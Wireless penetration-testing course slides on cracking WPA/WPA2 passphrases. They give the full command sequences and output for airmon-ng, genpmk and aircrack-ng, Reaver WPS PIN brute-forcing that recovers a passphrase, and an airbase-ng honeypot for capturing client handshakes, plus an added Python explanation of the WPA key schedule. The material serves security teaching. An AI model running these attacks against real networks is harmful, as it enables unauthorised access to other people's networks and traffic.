
Wireless Pentest

WPA & WPA2

Instructor

Marcos Pitanga
marcos.pitanga@gmail.com

Wi-Fi Protected Access

A little more theory

WPA - Pre-Shared Key

WPA Attack

Decrypting WPA-PSK

WPA2 - PSK

Uses the same principles as WPA


The weakness lies in the passphrase chosen
Nothing more to be said!!!!!
Same procedure as before

Speeding up the cracking process


We can precompute the PMK for a given SSID and a wordlist using the genpmk tool:
genpmk -f /pentest/passwords/wordlists/darkc0de.lst -d PMK-Wireless-Lab -s "Wireless Lab"
Let's create a WPA-PSK network with the password skysign and
capture the WPA handshake of this network

Speeding up the cracking process

Measure the time taken with aircrack

and compare

Using the PMK with aircrack

Pyrit for multi-CPU systems

How does Reaver work?

Exploits the vulnerability in Wi-Fi Protected Setup (WPS)


Brute-forces WPS PINs to reveal the WPA or WPA2 passphrase
Takes 4 to 10 hours
Does not work on all APs

Cracking via Reaver


1) airmon-ng start wlan0
2) airodump-ng mon0
In another terminal:
3) root@bt:~# reaver -c 11 -a -i mon0 -b 34:08:04:C0:B6:4E -vv
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Waiting for beacon from 34:08:04:C0:B6:4E
[+] Switching mon0 to channel 11
[+] Associated with 34:08:04:C0:B6:4E (ESSID: multipinguim-2)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message

Cracking via Reaver


root@bt:~# reaver -S -c 11 -a -i mon0 -b 34:08:04:C0:B6:4E -v
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Waiting for beacon from 34:08:04:C0:B6:4E
[+] Associated with 34:08:04:C0:B6:4E (ESSID: multipinguim-2)
[+] Trying pin 12345670
[+] Trying pin 00005678
[+] Trying pin 01235678
[+] Trying pin 11115670
[+] Trying pin 22225672
[+] Trying pin 33335674
[+] 0.05% complete @ 2012-05-07 20:43:57 (3 seconds/pin)
[+] Trying pin 44445676
[+] Trying pin 55555678
[+] Trying pin 66665670
[+] Trying pin 77775672
[+] Trying pin 88885674
[+] 0.10% complete @ 2012-05-07 20:44:14 (3 seconds/pin)
[+] Trying pin 99995676
[+] Trying pin 00015677
[+] Trying pin 00025676
[+] Trying pin 00035675

Cracking via Reaver

root@bt:~# reaver -S -c 11 -a -i mon0 -b 34:08:04:C0:B6:4E -vv -p 22838353

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Switching mon0 to channel 11
[+] Waiting for beacon from 34:08:04:C0:B6:4E
[+] Associated with 34:08:04:C0:B6:4E (ESSID: multipinguim-2)
[+] Trying pin 22838353
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 3 seconds
[+] WPS PIN: '22838353'
[+] WPA PSK: 'DECADA1234'
[+] AP SSID: 'multipinguim-2'
[+] Nothing done, nothing to save.

Connecting to a WPA network


wpa-supp.conf


Cracking AP-less WPA Personal

To crack WPA we need the 4-way handshake, which gives us:

Authenticator Nonce, Supplicant Nonce, Authenticator MAC, Supplicant MAC.
But for this attack we don't need all of these packets:
either packets 1 & 2, or packets 2 & 3.

So to crack it we set up a WPA-PSK honeypot for the client to connect to;
we only need msg 1 and msg 2.
We don't need to know any passphrase ;-)
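The key schedule behind the two slides above (the genpmk precomputation and the 4-way handshake), as an added example that is not from the course or from any of the tools named: the PMK is PBKDF2-HMAC-SHA1 of the passphrase salted with the SSID, which is why a genpmk table is bound to a single SSID and why a unique SSID plus a long passphrase is the defence, and the PTK is derived from the PMK together with the two MACs and two nonces that messages 1 and 2 carry, which is why those two messages are enough. The PMK test vector is from IEEE 802.11-2004 Annex H; the MACs, nonces and wordlist in the demo are constructed.

```python
# Added example (not from the slides): the WPA/WPA2-Personal key schedule
# from IEEE 802.11i, showing why PMK tables are per-SSID and why handshake
# messages 1 and 2 suffice to derive (and therefore verify) the PTK.
import hashlib
import hmac


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """Pairwise Master Key: PBKDF2-HMAC-SHA1, 4096 rounds, salted with the SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def pmk_table(ssid: str, wordlist) -> dict:
    """Per-SSID PMK table, the idea behind genpmk; worthless for any other SSID."""
    return {word: wpa_pmk(word, ssid) for word in wordlist}


def wpa_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Pairwise Transient Key via PRF-512: 4 HMAC-SHA1 blocks, truncated to 64 bytes.

    AA/ANonce come from handshake message 1, SPA/SNonce from message 2; the
    min||max ordering makes both sides derive the same key.
    """
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    label = b"Pairwise key expansion"
    blocks = [hmac.new(pmk, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]


def split_ptk(ptk: bytes) -> dict:
    """KCK authenticates the handshake MICs, KEK wraps the GTK, TK protects data frames."""
    return {"KCK": ptk[:16], "KEK": ptk[16:32], "TK": ptk[32:48]}


if __name__ == "__main__":
    # Official test vector from IEEE 802.11-2004 Annex H.4.
    assert wpa_pmk("password", "IEEE").hex() == (
        "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e")
    # Same passphrase, different SSID -> different PMK, so a table built for
    # "Wireless Lab" says nothing about a network with a unique SSID.
    table = pmk_table("Wireless Lab", ["skysign", "DECADA1234"])  # constructed wordlist
    print(table["skysign"] != wpa_pmk("skysign", "multipinguim-2"))  # True
    # Constructed MACs and nonces standing in for the fields read from messages 1 and 2.
    aa, spa = bytes.fromhex("020000000001"), bytes.fromhex("020000000002")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    ptk = wpa_ptk(table["skysign"], aa, spa, anonce, snonce)
    print({k: v.hex() for k, v in split_ptk(ptk).items()})
```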

Cracking AP-less WPA Personal


1) Set up our honeypot
airbase-ng -c 3 -a <AP> -e "Wireless Lab" -W 1 -z 2 mon0
2) Start airodump
airodump-ng -c 3 --bssid <AP> --write sem-AP-WPA-cracking mon0
3) Go back to the airbase screen and watch the clients associate
4) Go back to the airodump screen and check whether it captured the WPA Handshake
5) Now run aircrack
aircrack-ng -w wordlist.txt -b <AP> sem-AP-WPA-cracking-01.cap
